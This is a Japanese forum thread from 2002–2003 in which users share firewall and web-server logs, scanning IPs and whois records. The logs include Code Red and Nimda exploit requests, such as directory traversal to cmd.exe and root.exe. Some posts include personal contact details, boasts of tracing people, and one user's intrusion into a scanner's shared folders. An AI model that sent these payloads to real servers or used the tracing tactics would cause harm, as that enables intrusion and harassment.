p. [Name Server] ns2.cc22.ne.jp
y. [Reply Mail]
[email protected] y. [Reply Mail]
[email protected] y. [Reply Mail]
[email protected] [State] Connected (2003/01/31)
[Registered Date] 1997/01/24
[Connected Date] 1997/01/27
[Last Update] 2002/03/25 16:25:39 (JST)
[email protected]
これはなんだ? The firewall has blocked Internet access to your computer (TCP Port 445) from 0.0.0.0 (TCP Port 2784).
159 :
名無しさん@お腹いっぱい。 :02/11/03 12:08
YahooBB218123214054 YahooBB218123214054 YahooBB218123214054
>>156 それの意味分かって貼り付けてるのか?お前
>>158 ネタじゃないよ。。。とにかくThanks!
IP 65.116.209.154 DNS host-65-116-209-154.day-soulutions.com
163 :
名無しさん@お腹いっぱい。 :02/11/03 15:38
南アフリカにもネットができるようだな。
164 :
名無しさん@お腹いっぱい。 :02/11/03 16:05
ってゆーか踏み台のIP晒してもあまり意味なくないかい?
166 :
名無しさん@お腹いっぱい。 :02/11/03 18:40
ある有名株式会社に生IPでアクセスしたら すぐに不正アクセスを試みられたよ。 炎壁ではじいたけどね。 こんなことしてたら、晒すぞ。
>>166 pingとかプロキシチェックの類じゃねーだろうな?オイ
AUTHだと思われ。
他に何あったっけ…
171 :
名無しさん@お腹いっぱい。 :02/11/08 18:09
209.99.226.172(1690)
172 :
名無しさん@お腹いっぱい。 :02/11/09 11:04
>>171 OrgName: Millicom Argentina SA
OrgID: MILC
NetRange: 209.99.224.0 - 209.99.239.255
CIDR: 209.99.224.0/20
NetName: NET-MIC-AR
NetHandle: NET-209-99-224-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.MILLIC.COM.AR
NameServer: DNS2.MILLIC.COM.AR
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-05-02
Updated: 2001-09-06
TechHandle: DL1111-ARIN
TechName: Larranaga, Diego
TechPhone: 5411-4732-8107
TechEmail:
[email protected] # ARIN Whois database, last updated 2002-11-07 19:05
# Enter ? for additional hints on searching ARIN's Whois database.
とでた
173 :
名無しさん@お腹いっぱい。 :02/11/09 11:55
175 :
名無しさん@お腹いっぱい。 :02/11/09 13:45
Λ_Λ (−_−;)
176 :
名無しさん@お腹いっぱい。 :02/11/10 00:46
219.22.208.2 こいつ粘着なんですけど、お分かりの人どうですか?
何が? というか、わかったとしてどうする気?
知ったかが書き込むオナニースレはここですか?
202.29.34.222 ウザイぐらいアタックしてくる
180 :
名無しさん@お腹いっぱい。 :02/11/11 07:42
62.195.112.62 - - [10/Nov/2002:23:47:36 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-" 211.111.102.111 - - [11/Nov/2002:01:17:09 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-" 61.188.206.165 - - [11/Nov/2002:03:39:42 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-" 65.101.46.50 - - [11/Nov/2002:05:19:17 +0900] "GET / HTTP/1.1" 400 376 "-" "-" 203.169.174.254 - - [11/Nov/2002:05:25:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-" 204.152.186.58 - - [11/Nov/2002:05:28:24 +0900] "CONNECT 65.122.104.42:7000 HTTP/1.0" 405 300 "-" "-" 24.141.225.1 - - [11/Nov/2002:05:59:56 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-" 煮るなり焼くなりどうぞ。
207.176.215.73
customer-148-223-208-114.uninet.net.mx こいつは何処だろ?
時間, イベント, 侵入者, カウント 2002/11/16 03:05:41, SMTP port probe, 211.205.165.32, 3 2002/11/16 02:26:56, HTTP port probe, 64.253.228.125, 1 2002/11/15 23:53:52, RPC TCP port probe, 202.102.4.38, 1 2002/11/15 23:17:38, SQL port probe, 210.52.223.4, 3 2002/11/15 23:15:29, HTTP port probe, ART.xxx.or.jp, 2 2002/11/15 16:54:34, NetBIOS port probe, host130-144.pool14416.interbusiness.it, 2 2002/11/15 14:33:27, SQL port probe, 194.200.201.56, 3 2002/11/15 14:21:41, TCP port probe, 203.152.26.170, 2 2002/11/15 13:20:09, HTTP port probe, 211.217.208.111, 3 2002/11/15 06:41:12, SMTP port probe, pcp02801511pcs.catonv01.md.comcast.net, 2 2002/11/15 05:51:14, SMTP port probe, 61.61.68.72, 1 2002/11/15 04:57:05, HTTP port probe, 61.144.18.2, 3 2002/11/15 04:10:56, FTP port probe, 203.194.195.173, 2 ART.xxx.or.jp・・・
185 :
名無しさん@お腹いっぱい。 :02/11/16 15:54
ひょっとして俺は踏み台にされているのか? ルータの通信情報ログに現在確認できるだけで90件もこんなのがあります。 2002/11/16 08:07:15 NAT RX Not Found : UDP 172.26.34.200 : 16432 > 172.26.152.179 : 6970 (IP-PORT=7)
侵入者のIPアドレス: 200.204.78.230 侵入者のMACアドレス: 0004AC389F41 DNSの逆引き: 200-204-78-230.its.org.br NetBIOS名: IS~ITSERVER Node: ITSERVER Group: ITS 発信元Port番号: 0 宛先Port番号: 0 攻撃の種類: SYN Flooding カウント: 72 カウント(延べ): 286 発信元Port番号: 4366 宛先Port番号: 1433 攻撃の種類: SQL Port Probe カウント: 39 カウント(延べ): 138 発信元Port番号: 3581 宛先Port番号: 137 攻撃の種類: Ping of Death カウント: 18 カウント(延べ): 122 延々と繰り返してる。何なんだこの馬鹿は。
188 :
名無しさん@お腹いっぱい。 :02/11/16 20:33
189 :
名無しさん@お腹いっぱい。 :02/11/16 23:36
fwisp12-ext-y.docomo.ne.jp DoCoMo/1.0/SO503i/c10
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters は面白い
191 :
名無しさん@お腹いっぱい。 :02/11/17 05:13
>>162 に8連射された。なんなの? 意味そのものがわからん。
SYGATEが防いだけど、どんな種類の攻撃なんだろう?
TCPで表示があった。TCPの意味もわからんが、多分、東京のどこか?だと思う。
192 :
名無しさん@お腹いっぱい。 :02/11/17 05:28
tcrc.edu.tw (Taiwan)
The domain that you requested, tcrc.edu.tw, has already been registered by the organization below. Please click here to see other options for this name.
Ministry of Education Computer Center
12th Fl, 106, Hoping E. Road, Sec 2.
Taiwan Republic of China, R.O.C
TW
Domain Name: edu.tw
Contact:
TANet, Administrator
[email protected] 886-2-27377010-295
whoisうざい
IP:24.169.144.135 DNS:hvc-24-169-144-135.hvc.rr.com
197 :
名無しさん@お腹いっぱい。 :02/11/19 07:40
a. [IPネットワークアドレス] 202.244.160.0-202.244.191.0 b. [ネットワーク名] GRASS-NET f. [組織名] 倉敷芸術科学大学 Time, Intruder, Event, Count 2002/09/27 21:35:05, 61.194.8.76, DNS TCP port probe, 4 2002/09/28 13:27:22, 210.112.133.155, SQL port probe, 2 2002/10/11 18:32:19, 61.240.177.14, HTTP port probe, 2 2002/10/11 22:51:26, 218.15.225.216, HTTP port probe, 3 2002/10/13 13:19:37, 61.149.8.141, HTTP port probe, 1 2002/11/05 17:07:45, 61.149.1.4, HTTP port probe, 1 2002/11/13 15:20:00, 192.168.1.1, UDP port probe, 2 2002/11/15 14:53:11, j191151.ap.plala.or.jp, IP last fragment length changed, 4 2002/11/15 14:56:18, j191151.ap.plala.or.jp, IP last fragment length changed, 4 2002/11/18 21:25:09, 202.244.174.220, DNS name overflow contains %, 2 2002/11/18 21:25:26, 202.244.174.220, DNS name overflow, 4 2002/11/18 21:25:40, 202.244.174.220, DNS non-Internet lookup, 17
198 :
名無しさん@お腹いっぱい。 :02/11/19 09:22
c-66-176-160-241.se.client2.attbi.com しし座流星を観に逝っている間だった 1個しか観られんかったが‥
199 :
名無しさん@お腹いっぱい。 :02/11/20 01:36
ポート32968って何??? 210.147.253.195から来たが・・・
200 :
名無しさん@お腹いっぱい。 :02/11/22 12:46
>>199 Commonly Used Ethernet Protocol Types
32968 Intergraph Corporation
201 :
名無しさん@お腹いっぱい。 :02/11/22 21:46
210.190.142.73(www6.ocn.ne.jp) Port 3488 (TCP) 2ちゃんにいくと上記のプログラムが個人IP宛に送られる しくみになってます!
ふーん 210.190.142.73(www6.ocn.ne.jp) Port 3488 (TCP).exe なんてプログラムあるんだ?へー プ
>>202 ファイル名に使えない文字は使用されてないからあっても不思議じゃないが、何か?
>>203 =201
はいはい、ネタは他の板でやれ。
205 :
名無しさん@お腹いっぱい。 :02/11/22 23:34
219.191.240.74 うざい。毎日数十回アタックしてくる。 こいつ何者ですか?
曲者 巻者 ものみんた
207 :
名無しさん@お腹いっぱい。 :02/11/23 00:57
ここ三日で攻撃してきた糞ドモのIPをいいます。 ノートン先生が反応しまくってんだYO!! 218.222.107.207 218.47.88.99 210.170.243.13 218.42.99.253 61.213.92.52 219.160.255.101
208 :
名無しさん@お腹いっぱい。 :02/11/23 01:04
また続き 219.106.29.120 219.108.228.45 218.47.207.21 202.232.95.174 210.238.168.86 210.147.233.171 220.36.100.94 218.42.99.253 61.214.22.161 218.224.185.231 210.254.2.66 61.197.62.155 218.142.168.14 61.125.251.98 61.117.78.134 218.42.100.232
209 :
名無しさん@お腹いっぱい。 :02/11/23 01:06
またまた続き 218.217.175.153 202.232.95.112 210.159.215.113 165.76.178.170 219.111.105.112 219.98.249.204 219.111.105.112 211.132.18.47 218.47.23.164 219.104.182.84 61.115.100.58 219.104.137.204 219.160.245.47 61.214.22.161 61.197.62.155 165.76.252.162 218.43.141.91 210.130.186.31 61.210.26.155 以上
1.1.1.1 これって・・・?
212 :
名無しさん@お腹いっぱい。 :02/11/23 06:20
さっき24.88.47.53からトロイの木馬Backdoor/SubSeven来た。 しかもこのIP、13日にもBackdoor/SubSevenで攻撃にきてる。 日付が変わっても同じ所から同じ手口ってことは同一人物って事?
>>207-210 ノートンが防いだんじゃIPSpoofされて無いかわからないだろうがヴォケ。
晒したかったらTCP接続を確立させてからにすることだ。
こんなこと書いても、お前の知能じゃ何を言っているかわからないだろうから、わかるように超訳してやる。
素人は帰れ、二度と来るな。
214 :
>>213 :02/11/23 15:12
>>213 同
>>212 >しかもこのIP
恥ずかしいからIPIP言うな馬鹿
得意げに「最近うちの鯖にアタックくんのがウゼェよ」とか言ってそうだな
こいつら・・
スキャニングでいちいち騒ぐなシロウトども。
されるのが嫌ならネットワークから切り離せよ。
ムハー駄目だ駄目だ。あんまり馬鹿すぎて罵らずにはいられない。
>>207 〜209
>ここ三日で攻撃してきた糞ドモのIPをいいます。
>ノートン先生が反応しまくってんだYO!!
lol
あんた、プールアドレスって知ってマスカ?
なんというかスキャンしてきたアドレス晒す神経が信じられん。
ご丁寧に全部掲載ですか(><
あんたの師匠のノートン大先生がウルサイんだったら、
ボロPC買ってきてFWに仕立ててフィルタすりゃあいい。
ログの出力も閾値とか考えてさ・・
手作業で構築していくうちに少しはIP通信を理解していくんじゃないかね。
217 :
名無しさん@お腹いっぱい。 :02/11/23 18:03
>219.191.240.74 ヤフーのユーザーです。
218 :
名無しさん@お腹いっぱい。 :02/11/24 17:29
ntgifu004236.gifu.nt.isdn.ppp.infoweb.ne.jp
219 :
名無しさん@お腹いっぱい。 :02/11/24 22:12
inetnum: 211.90.0.0 - 211.91.255.255
netname: UNICOM
country: CN
descr: China United Telecommunications Corporation
admin-c: UCH1-AP
tech-c: UC6-AP
status: ALLOCATED PORTABLE
changed:
[email protected] 20020917
mnt-by: MAINT-CNNIC-AP
source: APNIC
role: Unicom China Hostmaster
address: 911 Room,Xin Tong Center,No.8 Beijing Railway Station
address: East Avenue, Beijing,PRC.
country: CN
phone: +86-10-6527-8866
fax-no: +86-10-6526-0124
e-mail:
[email protected]
>>220 自分の低脳ぶりを誰かにわかって欲しいんじゃない?
222 :
名無しさん@お腹いっぱい。 :02/11/25 10:20
>[17098-7]
>投稿者:[sniper] 投稿日:[2002年11月25日(月) 10:51:53]
>私の親友は、ある人の職業・本名しっかり調べたよ(笑)
>そして現在居住地も‥‥‥
>[17110-7]
>投稿者:[sniper] 投稿日:[2002年11月25日(月) 10:51:53]
>串屋の83の亡霊
>なぜそれほど気になる?
>串屋に教えると思っているのか?ア・マ・イ
>そんな間がらじゃないないよ
>キミの妄想癖で推測したらどうかな?
>異常な粘着質
>執拗なぶら下がり
>オートリバースな会話
>ボキャ貧
>検索魔
>これがキミの印象だ
http://www.makiko.gr.jp/cgi-bin/bbs.cgi
223 :
名無しさん@お腹いっぱい。 :02/11/25 19:09
219.106.116.162 inetnum: 219.106.0.0 - 219.106.127.255 netname: SANNET descr: SANYO Electric Software Co., Ltd.
225 :
名無しさん@お腹いっぱい。 :02/11/25 20:07
165.76.253.174 こいつさっきから攻撃しまくってきてる。(今も攻撃してきてる めっちゃうざい
226 :
名無しさん@お腹いっぱい。 :02/11/25 20:08
言い忘れましたが約三十秒に一回で攻撃してきています。
228 :
名無しさん@お腹いっぱい。 :02/11/25 20:23
174.pool5.dsl8mtokyo.att
229 :
名無しさん@お腹いっぱい。 :02/11/25 20:24
自分がアタックされているのはどこでみるのですか? 当方セキュリティソフトなにもいれてません。 もうばんばん攻撃とかされてり盗まれたりしてるんですかね?
232 :
名無しさん@お腹いっぱい。 :02/11/25 22:47
1時間30分程前、多分中国からだと思いますがport probeがありましたので お知らせします、今現在ネットから繋がりますので興味がある方は法律に触れない よう気をつけて調査して下さい。 IP:202.101.212.139 Node: A NetBIOS: IS~A Group: WORKGROUP MAC: 00E04C00003F 共有ネットワーク:12(PC) どうも、学校もしくは 会社から不正アクセスしているようですが、こちらから侵入できる ところをみると、MS修正パッチをあてていないようです。 ただ、12フォルダ内のemlのファイルはあきらかにnimda32ウィルスを 検知しており極めて危険な存在です。 ウィルスを蔓延させる可能性もあるので皆さん注意して下さい。
>>232 ウイルスの感染活動を、不正アクセスって一括りにまとめてまうのは、いかがなものかと。
235 :
名無しさん@お腹いっぱい。 :02/11/25 23:40
>>233-234 ただ、12PC上の2emlのファイルが同じnimda32ウィルス感染ファイルを保存しているひとも、
おかしいですよ!
容量もかるく5〜9MB以上あるメールですよ!!
普通の人じゃないです。
>>235 超マジレスですが。
それを確かめに逝ったって時点で、広義での不正アクセスっす、君って。
放置でええやん、そんなの。
中国(中華人民今日は酷)で違法コピーが蔓延していますが、 ウィルス、とくに Redlof に感染しまくりの公司やなにやら、 いっぱいありぃーのがありますので、ご注意を…
>>231 ゾーンアラームってのをいれてみました。
ありがとうございます。
まあ、ことこの手のスレに「報復」しに来る輩の件に関しては 小学生を相手に話をしているのと同様に考えたほうが良いかと。
240 :
名無しさん@お腹いっぱい。 :02/11/26 16:31
n238155.ap.plala.or.jp
241 :
名無しさん@お腹いっぱい。 :02/11/27 09:34
242 :
bloom :02/11/27 09:38
pc15162.amigo2.ne.jp ntgifu006024.gifu.nt.isdn.ppp.infoweb.ne.jp
相変わらず、このスレは馬鹿が大暴れしてるな。 scanぐらいでぎゃーぎゃーさわいでんじゃねぇよ。ボケども。
245 :
名無しさん@お腹いっぱい。 :02/11/29 08:00
Registrant:
Shigeru Kanemoto
9-2-401, Nibancho
Chiyoda, Tokyo 1020084
Japan
Registrar: Dotster (
http://www.dotster.com )
Domain Name: PPONA.COM
Created on: 20-MAR-01
Expires on: 20-MAR-04
Last Updated on: 29-JUN-02
Administrative Contact:
Kanemoto, Shigeru
[email protected] 9-2-401, Nibancho
Chiyoda, Tokyo 1020084
Japan
+81-3-5226-7552
+81-3-5226-7551
Technical Contact:
Kanemoto, Shigeru
[email protected] 9-2-401, Nibancho
Chiyoda, Tokyo 1020084
Japan
+81-3-5226-7552
+81-3-5226-7551
61.120.31.161 これ串ですかね?
247 :
名無しさん@お腹いっぱい。 :02/11/29 14:21
↑5点だ、5点
249 :
名無しさん@お腹いっぱい。 :02/11/30 12:15
>>244 馬鹿が大暴れしてるカキコしか反応しないボケです。
251 :
名無しさん@お腹いっぱい。 :02/11/30 16:46
偽造したアドレスで広域にスキャンする。 偽造アドレスとスキャンしたアドレスの対応とっとけば馬鹿が何処にいるかわかるな。(w
253 :
名無しさん@お腹いっぱい。 :02/11/30 21:09
>>253 はぁ? してねぇよ。
お前の頭おかしいんじゃねぇか?
一回死んでこい。
>>255 わけわかんね。
余裕こいてんじゃねぇよ。
お前も死ねよ。ばーか。
257 :
名無しさん@お腹いっぱい。 :02/12/07 11:51
Time, Intruder, Event, Count 2002/12/07 YahooBB218124046061.bbtec.net, DNS non-Internet lookup, 1 2002/12/07 YahooBB218124046061.bbtec.net, DNS non-Internet lookup, 1 2002/12/07 218.124.46.61, DNS name overflow, 1
258 :
名無しさん@お腹いっぱい。 :02/12/07 12:05
>>252 バカに教えてクレイ。
偽装IPでスキャンした場合、スキャン結果は偽装IP先へ届かないか?
>>259 センクス。ってことは、
【攻撃したヤシのPCには届かない = クラッカーに情報が届かない】
じゃん?
結果が届かなければ、スキャンの意味ないのでは。
DOS系やflood系などなら偽装の意味もわかるのだが。
SRC xx.xx.0.0 - xx.xx.255.254 DST yy.yy.0.0 - yy.yy.255.254 でスキャンするだろ。んでもって馬鹿がxx.xx.100.100から攻撃されたと騒いだら 馬鹿のIPアドレスはyy.yy.100.100って事じゃねいかい。
なるほろ。
【 納 得 】
>>252 の意味がワカタヨヽ(´ー`)ノ
263 :
名無しさん@お腹いっぱい。 :02/12/07 15:07
257のは、それで何が分かりますか?
264 :
名無しさん@お腹いっぱい。 :02/12/07 17:16
>>263 キミが257によって把握できた情報を書いてミソ
267 :
名無しさん@お腹いっぱい。 :02/12/08 09:22
2002/12/08 09:10:17 IP_Filter REJECT UDP 192.168.1.2:137 > 192.168.1.255:137 (IP-PORT=0) この同一IPのログが立て続けに昨日から200件あります。 接続を一旦切って繋げ直してもまた出ます。 これは一体なんでしょうか?
>>267 ローカルホストだからあなたのパソコン。
269 :
名無しさん@お腹いっぱい。 :02/12/10 18:22
6分間で4回続けて。 なんか怖いなー。 64.71.177.66
270 :
名無しさん@お腹いっぱい。 :02/12/10 18:23
↑さっきみたら更に2回… ((;゚Д゚)ガクガクブルブル
271 :
名無しさん@お腹いっぱい。 :02/12/10 18:41
272 :
名無しさん@お腹いっぱい。 :02/12/10 18:46
192.116.231.167 うざい! こいつを懲らしめる方法を教えてください
273 :
名無しさん@お腹いっぱい。 :02/12/10 19:00
>>272 お前のローカルホストだから、自分でやれ。
275 :
名無しさん@お腹いっぱい。 :02/12/10 19:39
>> 274 ちゃうよー。 アドレスから検索すればわかるが、これはイタリアからのアタックです。
>>275 it と il を見間違えてるよな?
il → イスラエル
>>275 >この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
>様々なネット上の危険からの防御法や対策を語りあうための板です。
>掲示板の荒らし方や侵入の方法、メールボムの送り方等、
>攻撃方法の質問はご遠慮下さい。
>2ちゃんねるでは荒らし依頼は出来ません。
>また、この板ではアタック依頼は受け付けません。
>ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
うおぉぉぉりゃぁぁぁーーーー 62.139.254.116
279 :
名無しさん@お腹いっぱい。 :02/12/11 22:25
こいつ国内の nimuda でやがんの。まだこんな奴いるとはね [Thu Nov 21 18:12:00 2002] [error] [client 61.213.242.130] File does not exist: /xxx/xxx/htdocs/scripts/root.exe
iplog[19100]: TCP: port scan detected [port 443] from 62.79.111.26 [ports 49939,49941,49942,49967,49970,...] ところでこういう方にはどうしてますか? やり返すとか?どうやり返せと? 方法キボンヌ
282 :
名無しさん@お腹いっぱい。 :02/12/12 03:58
80.117.33.195:23319 イタリア人まじうぜー
283 :
名無しさん@お腹いっぱい。 :02/12/12 04:32
i031252.ap.plala.or.jp
284 :
名無しさん@お腹いっぱい。 :02/12/12 06:26
dsl081-127-201.dfw1.dsl.speakeasy.net 妙なTCPポートで漏れのPCから発信・・・
285 :
名無しさん@お腹いっぱい。 :02/12/12 17:56
286 :
名無しさん@お腹いっぱい。 :02/12/13 04:14
ポート1433に211.186.130.98から。ウザー
217.84.253.142:33441 (pD954FD8E.dip.t-dialin.net) ポート 2402 (TCP) 今日に入ってから延々と30回のアタックが続いている。繋ぎ直しても同じ。 ファイアーウォール入れて以来、ここまでしつこいのは初めて。
50回に達する前に回線切ってメシ食って、 繋ぎなおしたら止まってますた。
>>289 そういうこと書けば書くほど
その機関ではなく
>>289 自体の無知さ加減があらわになるんだが。
292 :
名無しさん@お腹いっぱい。 :02/12/14 18:38
あげ
445とかつつかれるとちょっとびびるね。 心臓に悪いからやめてくれ。 でも80とかくるのはなんだろう?ほむぺと間違えてるのか? メッセンジャー、ファイヤーウォールでカットするとすごいことになるよ。 60回とか平気でトライしようとするもん。そんなしつこくしなくても・・
[11/Dec/2002: +0900] "PROPFIND /SharedDocs HTTP/1.1" 404 282 [11/Dec/2002: +0900] "PROPFIND /SharedDocs HTTP/1.1" 404 282 [11/Dec/2002: +0900] "GET / HTTP/1.1" 200 4306 [11/Dec/2002: +0900] "GET /icons/blank.gif HTTP/1.1" 304 - [11/Dec/2002: +0900] "GET /icons/folder.gif HTTP/1.1" 304 - [11/Dec/2002: +0900] "GET /icons/image2.gif HTTP/1.1" 304 - [11/Dec/2002: +0900] "GET /icons/text.gif HTTP/1.1" 304 - コレって何しようとしてたの? ずっと見てて不思議に思ったんだけど。意図がよくわからん。 一応侵入者のログです。
295 :
名無しさん@お腹いっぱい。 :02/12/14 23:32
侵入者つうかハッカーって誰のPCにも攻撃してくるんですか!? このスレ見てるとみんな実は被害にあってるのかなぁっと思ったりします。
>>295 99%ゴミバケツかネットワーク設定者のミスです
>>294 見たままだ。そのまま理解しれ。わからなくても気にするな。弾いたんだろ?
>>295 大部分の人がファイヤーウォールで防いでいると思うよ。
もれは2日前に導入したばかりのZoneAlarmが334回も防いでいるよ。
うち30回は危険なアクセスだとよ。
299 :
名無しさん@お腹いっぱい。 :02/12/14 23:51
ダイヤルアップのIPアドレスだと地域を特定されませんか?
>>299 IPアドレスから地域を特定できたら神。
>>299 は数人しかインターネットユーザがいないような過疎地域に住んでるのか?
それなら困るだろうな。
>>300 ですよね!
PC初心者板では出来るって言ってる人が何人も・・・
>>294 apacheを下手くそにインストールしてると/iconsが
外からもアクセスできるという罠。
>>300 じゃあ、アクセスポイントを変えるだけで2chのスレが立て放題ってのも嘘ですよねぇ?
奥多摩
マジレス下さい。
あとPC番号から同一人物を見抜くって言うけど、あれは荒らしに対する脅しですよね?
・えさを与えないでください
>>299 南鳥島とか… (w
FQDNから地域が推測できるISPも存在する。
tracerouteかければルータのFQDNから推測できる場合もある。
>>299 もし、キミがダイアルアップで接続してるのなら、名前に
fusianasan
と入れて再度書きこみを見てみれば?
そこに***TKY***とか出れば東京だとわかる。
***.***.***.***の数字だけなら、プロバイダ所在地ぐらいはワカルかも。
>>309 す、スマン・・・そういうことだったのか。
313 :
299 U063072.ppp.dion.ne.jp :02/12/15 00:18
>>311 ***.***.***.***ってマニアックなプロバイダでしょ?
このスレはIP厨の掃き溜めだから活用されると困るんだよね。 機能すると困るスレ。変なスレだ。 あと質問は初級ネットかPC初心者でやれ。 このスレに書きこみに来る時点で基礎知識が無い。
315 :
299 U063072.ppp.dion.ne.jp :02/12/15 00:25
>もし、キミがダイアルアップで接続してるのなら、名前に >fusianasan >と入れて再度書きこみを見てみれば? これは何でダイヤルアップならってなってるんですか? ADSLだといけないんですか? 教えて下さい、この通りです!m(_ _)m
有効活用しつつ埋め立てちまおう。
317 :
299 U063072.ppp.dion.ne.jp :02/12/15 00:30
ADSLでIPアドレス晒すとマズイの?
9 14 ms 14 ms <10 ms 210.163.230.106 10 14 ms 13 ms 14 ms gsr-otee4.kddnet.ad.jp [203.181.97.217] 11 14 ms <10 ms 13 ms otergs002.kddnet.ad.jp [203.181.97.198] 12 <10 ms 14 ms 14 ms oteGW04.v4.kddi.ne.jp [203.140.128.90] 13 13 ms 14 ms 14 ms tkyCORE02.v4.kddi.ne.jp [210.238.128.221] 14 14 ms 14 ms <10 ms tky3CORE02.v4.kddi.ne.jp [210.238.128.58] 15 14 ms 28 ms 13 ms ngnRT04.v4.kddi.ne.jp [218.222.0.134] 13,14,15あたりから東京という事が推測できるけど、それで困るのか?
322 :
299 U063072.ppp.dion.ne.jp :02/12/15 00:37
>>321 実は東京ではありません。スマソ
僕が某サイトでアク禁になったとき、dionユーザー全員がアク禁になるのか知りたかったんです。
324 :
299 U063072.ppp.dion.ne.jp :02/12/15 00:41
325 :
299 U063072.ppp.dion.ne.jp :02/12/15 00:43
プロバイダから先のアクセスポイントまでは辿れないんですよね?少なくともdionは そもそもダイヤルアップってアクセスポイントとかないよね?
61.213.136.18 sip1-18.dsnw.ne.jp こいつしつこすぎ。 なんなの?もう50回くらいあたっくしてきてるよ。
327 :
名無しさん@お腹いっぱい。 :02/12/15 02:09
本日たった今、 207.33.111.37 からWeLLノートンポートを全て総スキャソされました
まあ、WeLLノートンポートだからな。仕方ない。
331 :
名無しさん@お腹いっぱい。 :02/12/15 02:19
スプーフィングて知ってるか?
>>327 >>1 はTCP確立させて晒しているぞ。お前はそれをしていない。
この意味がわからないんだろうな。馬鹿だから。
>>332 よくみて味噌。ノートンポートだよ。 エサじゃないの?
334 :
名無しさん@お腹いっぱい。 :02/12/15 11:20
slip-12-65-120-92.mis.prserv.net
336 :
名無しさん@お腹いっぱい。 :03/01/13 23:45
219.145.190.120 - - [13/Jan/2003:20:23:11 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 296 "-" "-" 219.68.11.114 - - [12/Jan/2003:18:52:43 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 296 "-" "-"
337 :
名無しさん@そうだ選挙にいこう :03/01/14 07:04
あのさ、これって異常じゃねえ?時間がGMTね。 2003-01-13 08:40:46 80.130.182.226 HEAD /index.asp 200 2003-01-13 08:40:49 80.130.182.226 HEAD /root.exe 404 2003-01-13 08:40:52 80.130.182.226 HEAD /scripts/root.exe 404 2003-01-13 08:40:55 80.130.182.226 HEAD /msadc/root.exe 404 2003-01-13 08:40:59 80.130.182.226 HEAD /wwwroot/root.exe 404 2003-01-13 08:41:02 80.130.182.226 HEAD /images/root.exe 404 2003-01-13 08:41:05 80.130.182.226 HEAD /samples/root.exe 404 2003-01-13 08:41:08 80.130.182.226 HEAD /iissamples/root.exe 404 2003-01-13 08:41:11 80.130.182.226 HEAD /adsamples/root.exe 404 2003-01-13 08:41:14 80.130.182.226 HEAD /cgi-bin/root.exe 404
338 :
名無しさん@そうだ選挙にいこう :03/01/14 07:05
2003-01-13 08:41:17 80.130.182.226 HEAD /iisadmpwd/root.exe 404 2003-01-13 08:41:20 80.130.182.226 HEAD /cmd1.exe 404 2003-01-13 08:41:24 80.130.182.226 HEAD /scripts/cmd1.exe 404 2003-01-13 08:41:26 80.130.182.226 HEAD /msadc/cmd1.exe 404 2003-01-13 08:41:29 80.130.182.226 HEAD /wwwroot/cmd1.exe 404 2003-01-13 08:41:35 80.130.182.226 HEAD /images/cmd1.exe 404 2003-01-13 08:41:38 80.130.182.226 HEAD /samples/cmd1.exe 404 2003-01-13 08:41:41 80.130.182.226 HEAD /iissamples/cmd1.exe 404 2003-01-13 08:41:44 80.130.182.226 HEAD /adsamples/cmd1.exe 404 2003-01-13 08:41:47 80.130.182.226 HEAD /cgi-bin/cmd1.exe 404
339 :
名無しさん@そうだ選挙にいこう :03/01/14 07:05
2003-01-13 08:41:50 80.130.182.226 HEAD /iisadmpwd/cmd1.exe 404 2003-01-13 08:41:57 80.130.182.226 HEAD /scripts/shell.exe 404 2003-01-13 08:42:01 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500 2003-01-13 08:42:07 80.130.182.226 HEAD /winnt/system32/cmd.exe 404 2003-01-13 08:42:10 80.130.182.226 HEAD /scripts/..チ../winnt/system32/cmd.exe 500 2003-01-13 08:42:13 80.130.182.226 HEAD /scripts/..タ%9v../winnt/system32/cmd.exe 500 2003-01-13 08:42:16 80.130.182.226 HEAD /scripts/..タ%qf../winnt/system32/cmd.exe 500 2003-01-13 08:42:19 80.130.182.226 HEAD /scripts/..チ%8s../winnt/system32/cmd.exe 500 2003-01-13 08:42:22 80.130.182.226 HEAD /winnt/system32/cmd.exe 404 2003-01-13 08:42:25 80.130.182.226 HEAD /scripts/..チ%pc../winnt/system32/cmd.exe 500
340 :
名無しさん@そうだ選挙にいこう :03/01/14 07:06
2003-01-13 08:42:28 80.130.182.226 HEAD /scripts/..o../winnt/system32/cmd.exe 404 2003-01-13 08:42:31 80.130.182.226 HEAD /scripts/winnt/system32/cmd.exe 404 2003-01-13 08:42:35 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500 2003-01-13 08:42:38 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500 2003-01-13 08:42:41 80.130.182.226 HEAD /scripts/..%2f../winnt/system32/cmd.exe 500 2003-01-13 08:42:44 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500 2003-01-13 08:42:47 80.130.182.226 HEAD /winnt/system32/cmd.exe 404 2003-01-13 08:42:50 80.130.182.226 HEAD /scripts/..ッ../winnt/system32/cmd.exe 404 2003-01-13 08:42:53 80.130.182.226 HEAD /scripts/..ッ../winnt/system32/cmd.exe 404 2003-01-13 08:42:56 80.130.182.226 HEAD /scripts/..・ッ../winnt/system32/cmd.exe 404
341 :
名無しさん@そうだ選挙にいこう :03/01/14 07:06
